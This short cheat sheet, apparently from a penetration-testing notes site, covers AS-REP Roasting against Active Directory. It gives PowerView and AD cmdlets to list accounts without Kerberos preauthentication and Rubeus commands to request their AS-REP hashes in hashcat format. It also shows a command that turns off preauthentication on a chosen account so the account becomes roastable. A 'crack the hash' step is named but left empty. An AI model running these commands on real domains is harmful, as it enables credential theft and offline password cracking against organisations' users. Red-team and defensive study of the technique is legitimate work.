AS-REP Roasting
1) Enumerate users
Get-DomainUser -PreauthNotRequired -VerboseGet-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth2) Request AS-REP hash
.\Rubeus.exe asreproast /user:<target> /domain:domain.local /format:hashcat.\Rubeus.exe asreproast /creduser:"domain.local\user1" /credpassword:"password" /domain:domain.local /format:hashcatDisable Kerberos Preauth
Set-DomainObject -Identity user1 -XOR @{useraccountcontrol=4194304} -Verbose
Get-DomainUser -PreauthNotRequired -Verbose3) Crack the hash
Last updated